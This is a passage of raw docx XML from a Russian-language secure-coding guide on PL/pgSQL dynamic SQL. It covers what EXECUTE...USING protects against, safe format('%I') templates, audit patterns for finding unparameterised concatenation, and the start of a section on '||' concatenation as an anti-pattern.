        <w:t xml:space="preserve">        RETURN QUERY SELECT rec.table_name::text, cnt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END LOOP;</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Identifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rec.table_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">из information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не от user) — нет identifier-injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пробрасывается через USING — нет value-injection. LIKE pattern (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'%' || target || '%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — здесь pattern injection (3.15.1), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не SQL injection</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Безопасный pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но требует careful review: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> всё ещё нужен escape для LIKE-wildcards (см. 3.15.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда USING недостаточно</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">USING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для: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Identifier (table/column/schema name) — нужен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(3.16.1/3.16.2)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DDL-statements (CREATE/ALTER/DROP) — DDL не имеет bind-positions; identifier обязательно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%I</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Dynamic ORDER BY (см. 3.14)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Dynamic LIMIT/OFFSET в plpgsql — теоретически возможно через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но нужно cast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$1::int</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для каждого из этих cases: identifier —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значение для LIMIT — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$1::int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защитный pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атаки нет, если используется правильно. Подраздел в категории описывает (1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">что USING закрывает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (value injection), (2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">что USING НЕ закрывает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (identifier injection — нужен другой инструмент), (3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">comparison с другими подходами</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (format/</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для значений).</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EXECUTE...USING — доступно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 8.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (июль 2009). До 8.4 был только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'sql_string'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без USING — приходилось использовать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для escape values.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plpgsql функция строит dynamic SQL. USING-pattern предотвращает value-injection, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не identifier-injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.16.1/3.16.2/3.16.4).</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Большинство dynamic SQL в plpgsql использует USING для values. Канонические шаблоны (повторение для clarity):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Шаблон 1: один identifier + один value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %I WHERE id = $1', tbl) USING row_id;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Шаблон 2: identifier + несколько values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('UPDATE %I SET status = $1 WHERE id = $2', tbl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING new_status, row_id;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Шаблон 3: schema + identifier + USING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %I.%I WHERE owner = $1', sch, tbl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING current_user;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Шаблон 4: INTO + USING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT count(*) FROM %I WHERE created_at &gt;= $1', tbl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INTO result_count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING since_date;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Шаблон 5: RETURN QUERY EXECUTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURN QUERY EXECUTE format('SELECT * FROM %I WHERE n ILIKE $1', tbl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING search_pattern;</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USING сам по себе не уязвим. Признаки относятся к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">отсутствию USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в коде, где value подставляется через concat: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EXECUTE\s+'[^']*'\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкатенация значения после EXECUTE без USING.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prosrc LIKE '%EXECUTE%||%'</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prosrc NOT LIKE '%USING%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функции с concat без USING. Требуют ручного аудита.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 WHERE col = 'literal_value'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в EXECUTE-вычисленных SQL — индикатор embed-style, не bind.</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 ... USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — доступно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 8.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2009). Поведение не менялось. Никакие фиксы не требуются — это design-feature.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3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — identifier защита (parallel к value-защите 3.16.3).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3.16.2 quote_ident ограничения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — identifier alternative.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3.16.4 || конкатенация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — антипаттерн: где USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">должен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> был быть использован.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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — где USING становится критичным (любой gap → RCE under owner).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что USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">блокирует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Wire-Protocol bind не пропускает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5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая reference по bind-параметризации.</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«PL/pgSQL — Executing Dynamic Commands» — https://www.postgresql.org/docs/current/plpgsql-statements.html#PLPGSQL-STATEMENTS-EXECUTING-DYN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8.4 Release Notes (USING clause introduction) — https://www.postgresql.org/docs/release/8.4/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Wire Protocol: «Bind / Parse / Execute» — https://www.postgresql.org/docs/current/protocol-message-formats.html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xflr6 SQL injection safe pattern (R18) — https://gist.github.com/xflr6/33db779acd7fe79faadeb0f28fc053bd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2ndQuadrant blog: «Dynamic SQL in PL/pgSQL» — https://www.2ndquadrant.com/en/blog/dynamic-sql-pl-pgsql/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16.4 Конкатенация через || — антипаттерн</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Самый прямой и распространённый антипаттерн в plpgsql: построение dynamic SQL через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">прямую конкатенацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> оператором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или USING. Внешне выглядит «простее» чем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но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">каждый concat-point — потенциальная injection-точка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: identifier-injection (если concat имени таблицы/колонки), value-injection (если concat значения с одинарными кавычками), full SQL injection (если concat WHERE-фрагмента). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">самая часто встречающаяся форма R18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в legacy plpgsql-кодбазах: разработчик не использует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потому что «не знает» или «слишком verbose», и теряет защиту целиком.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот подраздел — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
